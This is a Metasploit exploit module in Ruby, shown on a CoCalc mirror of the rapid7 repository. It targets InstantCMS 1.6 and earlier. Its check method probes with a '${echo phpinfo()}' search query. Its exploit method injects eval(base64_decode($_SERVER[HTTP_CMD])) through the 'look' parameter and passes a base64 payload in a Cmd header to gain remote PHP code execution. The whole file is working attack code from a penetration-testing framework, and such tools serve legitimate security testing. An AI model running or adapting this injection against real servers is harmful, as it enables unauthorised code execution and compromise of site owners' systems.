CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/instantcms_exec.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'InstantCMS 1.6 Remote PHP Code Execution',

14
      'Description'    => %q{

15
        This module exploits an arbitrary PHP command execution vulnerability because of a

16
        dangerous use of eval() in InstantCMS in versions 1.6 and prior.

17
      },

18
      'Author'         =>

19
        [

20
          'AkaStep', # Vulnerability discovery and PoC

21
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module

22
          'juan vazquez' # Metasploit module

23
        ],

24
      'License'        => MSF_LICENSE,

25
      'References'     =>

26
        [

27
          [ 'BID', '60816' ],

28
          [ 'PACKETSTORM', '122176' ]

29
        ],

30
      'Privileged'     => false,

31
      'Platform'       => 'php',

32
      'Arch' => ARCH_PHP,

33
      'Targets'        =>

34
        [

35
          [ 'InstantCMS 1.6', { }  ],

36
        ],

37
      'DisclosureDate' => '2013-06-26',

38
      'DefaultTarget'  => 0))

39


40
    register_options(

41
      [

42
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])

43
      ])

44
  end

45


46
  def check

47
    res = send_request_cgi({

48
      'uri'      => normalize_uri(target_uri.to_s),

49
      'vars_get' =>

50
      {

51
        'view'	=> 'search',

52
        'query' => '${echo phpinfo()}'

53
      }

54
    })

55


56
    if res and res.body.match(/Build Date/)

57
      return Exploit::CheckCode::Vulnerable

58
    end

59


60
    Exploit::CheckCode::Safe

61
  end

62


63
  def exploit

64


65
    print_status("Executing payload...")

66


67
    res = send_request_cgi({

68
      'uri'      => normalize_uri(target_uri.to_s),

69
      'vars_get' =>

70
      {

71
        'view'	=> 'search',

72
        'query' => rand_text_alpha(3 + rand(3)),

73
        'look'  => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"

74
      },

75
      'headers' => {

76
        'Cmd' => Rex::Text.encode_base64(payload.encoded)

77
      }

78
    })

79


80
  end

81
end

82


83